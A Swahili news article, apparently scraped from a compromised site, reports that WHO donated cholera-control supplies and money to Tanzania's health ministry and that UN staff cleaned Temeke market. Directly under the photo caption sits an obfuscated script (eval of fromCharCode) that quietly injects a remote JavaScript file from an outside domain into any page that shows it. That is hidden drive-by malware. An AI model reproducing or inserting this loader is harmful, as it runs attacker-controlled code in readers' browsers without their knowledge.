Recent Comments

WHO yatoa dawa, fedha kudhibiti kipindupindu

By Baraka Bitariho Aug 29, 2015
<p>Katibu Mkuu Wizara ya Afya na Ustawi wa Jamii Dk Donan Mmbando</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Katibu Mkuu Wizara ya Afya na Ustawi wa Jamii Dk Donan Mmbando
Katibu Mkuu Wizara ya Afya na Ustawi wa Jamii Dk Donan Mmbando

WIZARA ya Afya na Ustawi wa Jamii imepewa msaada wa vitu mbalimbali zikiwemo dawa zenye thamani ya Sh milioni 42.2 pamoja na fedha taslimu milioni 160 kutoka Shirika la Afya Duniani (WHO) ili kusaidia mapambano dhidi ya ugonjwa wa kipindupindu.

Akizungumza jana jijini Dar es Salaam wakati akikabidhiwa msaada huo, Katibu Mkuu Wizara ya Afya na Ustawi wa Jamii Dk Donan Mmbando alisema shirika hilo limetoa katoni 1,000 za dawa ya kutibu maji (Water guard) na lita 100 za dawa za kudhibiti mazingira (Cresol Saponated Liquid).

Mbali na kuishukuru WHO kwa msaada huo, alisema watahakikisha vitu hivyo vinawafikia walengwa na kuhakikisha vinatumika ipasavyo ili kusaidia kudhibiti ugonjwa huo.

Alisema Watanzania wanapaswa kuelewa kwamba bado ugonjwa huo unaendelea kuwakumba wananchi na ni hatari hivyo wanapaswa kuhakikisha wanajiepusha na mambo yanayoweza kusababisha wakaupata.

“Nimesikitika sana ugonjwa haujadhibitiwa Mkoa wa Pwani sasa una wagonjwa; Kibaha kuna wagonjwa sita na kifo kimoja, Mkuranga mgonjwa mmoja. Ni jambo la kusikitisha sana,” alisema Mmbando.

Alisema ni vyema mtu akiona dalili za ugojwa huo asihame kwenda mkoa mwingine ili kusaidia ugonjwa huo usisambae zaidi katika mikoa mingine na kuwa serikali inatarajia kuongeza kambi nyingine katika eneo ambalo limeonekana kuwa na mlipuko mkubwa wa ugonjwa huo.

Kwa upande wake Mwakilishi Mkazi kutoka WHO hapa nchini, Dk Rufaro Chatora alisema, shirika hilo limetoa msaada huo ili kusaidia Serikali katika juhudi zake za kupambana mlipuko wa ugonjwa wa kipindupindu.

Wakati huohuo, katika kuadhimisho miaka 70 tangu kuanzishwa kwa Umoja wa Mataifa (UN), wafanyakazi wa Mashirika ya umoja huo nchini walijumuika na wakazi waTemeke katika kufanya usafi kwenye soko la Temeke. Shghuli hiyo waliifanya baada ya wiki iliyopita kufanya shughuli za upandaji miti katika miteremko ya mlima Kilimanjaro ambako walipanda miti 2,000.

Shughuli hizo za kufanya usafi ambazo ziliongozwa na Mratibu wa mashirika ya Umoja wa Mataifa nchini na Mwakilishi Mkazi wa Shirika la Maendeleo la Umoja wa Mataifa (UNDP), Alvaro Rodriguez, zilikuwa ni sehemu ya juhudi za kuleta uhalisia wa utunzaji wa mazingira kama umoja huo unavyofanya.

Akizungumza katika shughuli hizo Mkuu wa Wilaya ya Temeke, Sophia Mjema, ambaye alimwakilisha Mkuu wa Mkoa, aliupongeza Umoja wa Mataifa kwa kusherehekea miaka 70 kwa njia za kusaidia wananchi.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com